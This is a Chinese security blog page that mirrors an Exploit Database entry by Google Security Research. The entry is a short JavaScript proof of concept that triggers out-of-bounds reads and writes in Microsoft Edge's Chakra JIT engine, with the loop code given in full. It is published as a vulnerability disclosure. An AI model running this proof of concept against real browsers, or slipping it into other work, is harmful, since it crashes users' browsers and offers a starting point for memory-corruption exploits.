体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes

  • Exploit Database
  • 138 阅读
  • 作者: Google Security Research
    日期: 2018-07-12
  • 类别:
    • dos
    平台:
    • windows
  • 来源:https://www.exploit-db.com/exploits/45011/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    /*
    It seems that this issue is similar to theissue 1429(MSRC 42111). It might need to refresh the page several times to observe a crash.
     
    PoC:
    */
     
    let arr = new Uint32Array(1000);
    for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
    i--;
    i++;
    }
     
    arr[i] = 0x1234;
    }
     
上一篇: Instagram-Clone Script 2.0 – Cross-Site Scripting
下一篇: Hadoop YARN ResourceManager – Command Execution (Metasploit)
  • last Exploits
  • Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes的更多信息
  • PHPFreeChat 1.7 – Denial of Service:
  • SAS Integration Technologies Client 9.31_M1 ‘SASspk.dll’ – Stack Overflow:
  • Google Android – ‘IOMXNodeInstance::enableNativeBuffers’ Unchecked Index:
  • macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics:
  • Microsoft Windows XP – ‘win32k.sys’ Local Kernel Denial of Service:
  • Novell Netware – CIFS and AFP Remote Memory Consumption Denial of Service:
  • Pure-FTPd 1.0.48 – Remote Denial of Service:
  • SAP Adaptive Server Enterprise 16 – Denial of Service:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏